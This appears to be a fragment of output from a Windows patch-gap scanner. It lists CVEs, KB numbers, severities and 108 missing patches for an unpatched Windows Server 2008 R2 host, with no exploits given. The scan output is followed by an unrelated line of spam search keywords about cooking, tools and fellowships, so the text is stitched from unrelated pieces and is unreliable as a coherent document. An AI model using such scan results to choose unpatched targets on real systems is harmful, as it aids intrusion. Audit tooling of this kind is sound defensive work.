n/a, Date: 20110614CVE: CVE-2011-1264KB: KB2518295Title: Vulnerability in Active Directory Certificate Services Web Enrollment Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1267KB: KB2536275Title: Vulnerability in SMB Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20110809CVE: CVE-2011-1263KB: KB2546250Title: Vulnerability in Remote Desktop Web Access Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121113CVE: CVE-2012-2519KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100810CVE: CVE-2010-2561KB: KB2079403Title: Vulnerability in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, [+] Missing patches: 108– KB2656410: patches 10 vulnerabilities– KB2676562: patches 10 vulnerabilities– KB2659262: patches 10 vulnerabilities– KB2817183: patches 6 vulnerabilities– KB2507938: patches 5 vulnerabilities– KB2729451: patches 5 vulnerabilities– KB2840149: patches 4 vulnerabilities– KB2705219: patches 4 vulnerabilities– KB2742598: patches 4 vulnerabilities– KB2757638: patches 4 vulnerabilities– KB2712808: patches 4 vulnerabilities– KB2756920: patches 4 vulnerabilities– KB2808735: patches 4 vulnerabilities– KB2807986: patches 3 vulnerabilities– KB954430: patches 3 vulnerabilities– KB2271195: patches 3 vulnerabilities– KB2124261: patches 3 vulnerabilities– KB2656355: patches 3 vulnerabilities– KB2506212: patches 2 vulnerabilities– KB2706045: patches 2 vulnerabilities– KB2604114: patches 2 vulnerabilities– KB2393802: patches 2 vulnerabilities– KB2753842: patches 2 vulnerabilities– KB2645640: patches 2 vulnerabilities– KB2758694: patches 2 vulnerabilities– KB2479943: patches 2 vulnerabilities– KB2709715: patches 2 vulnerabilities– KB2719177: patches 2 vulnerabilities– KB982799: patches 2 vulnerabilities– KB976323: patches 2 vulnerabilities– KB2419640: patches 2 vulnerabilities– KB979309: patches 2 vulnerabilities– KB979482: patches 2 vulnerabilities– KB974571: patches 2 vulnerabilities– KB2621440: patches 2 vulnerabilities– KB2727528: patches 2 vulnerabilities– KB2535512: patches 2 vulnerabilities– KB2475792: patches 2 vulnerabilities– KB2716513: patches 2 vulnerabilities– KB2813170: patches 2 vulnerabilities– KB2631813: patches 2 vulnerabilities– KB2719033: patches 2 vulnerabilities– KB2667402: patches 2 vulnerabilities– KB2772930: patches 2 vulnerabilities– KB2425227: patches 2 vulnerabilities– KB2790655: patches 1 vulnerability– KB2653956: patches 1 vulnerability– KB2525835: patches 1 vulnerability– KB2618451: patches 1 vulnerability– KB2789644: patches 1 vulnerability– KB2483614: patches 1 vulnerability– KB2736418: patches 1 vulnerability– KB2770660: patches 1 vulnerability– KB2690533: patches 1 vulnerability– KB2785220: patches 1 vulnerability– KB2758857: patches 1 vulnerability– KB2621146: patches 1 vulnerability– KB2207559: patches 1 vulnerability– KB2546250: patches 1 vulnerability– KB2564958: patches 1 vulnerability– KB975560: patches 1 vulnerability– KB979687: patches 1 vulnerability– KB2423089: patches 1 vulnerability– KB979688: patches 1 vulnerability– KB2769369: patches 1 vulnerability– KB2560656: patches 1 vulnerability– KB2207566: patches 1 vulnerability– KB2691442: patches 1 vulnerability– KB2518295: patches 1 vulnerability– KB2385678: patches 1 vulnerability– KB2571621: patches 1 vulnerability– KB2305420: patches 1 vulnerability– KB2765809: patches 1 vulnerability– KB2378111: patches 1 vulnerability– KB978542: patches 1 vulnerability– KB2570947: patches 1 vulnerability– KB2536275: patches 1 vulnerability– KB2536276: patches 1 vulnerability– KB2487367: patches 1 vulnerability– KB975467: patches 1 vulnerability– KB2813347: patches 1 vulnerability– KB2387149: patches 1 vulnerability– KB2790113: patches 1 vulnerability– KB2790978: patches 1 vulnerability– KB2442962: patches 1 vulnerability– KB972270: patches 1 vulnerability– KB2294255: patches 1 vulnerability– KB2347290: patches 1 vulnerability– KB2743555: patches 1 vulnerability– KB982132: patches 1 vulnerability– KB2079403: patches 1 vulnerability– KB2698365: patches 1 vulnerability– KB977894: patches 1 vulnerability– KB2778930: patches 1 vulnerability– KB2643719: patches 1 vulnerability– KB2655992: patches 1 vulnerability– KB2296011: patches 1 vulnerability– KB982666: patches 1 vulnerability– KB2620712: patches 1 vulnerability– KB2584146: patches 1 vulnerability– KB2032276: patches 1 vulnerability– KB2654428: patches 1 vulnerability– KB2509553: patches 1 vulnerability– KB2647170: patches 1 vulnerability– KB2644615: patches 1 vulnerability– KB2544893: patches 1 vulnerability– KB2620704: patches 1 vulnerability– KB2685939: patches 1 vulnerability[+] Missing service pack– Windows Server 2008 R2 for x64-based Systems Service Pack 1[+] KB with the most recent release date– ID: KB2817183– Release date: 20130409.
How To Explain Cloud Computing To A Child, Paper Factory Near Me, Steamed Banana Cake Panlasang Pinoy, History Taking And Physical Examination Books, Makita Dealer Locator, Kitchenaid Best-loved Recipes, Oncology Fellowship Length, Novice To Expert Scale, Cafe French Door Double Oven,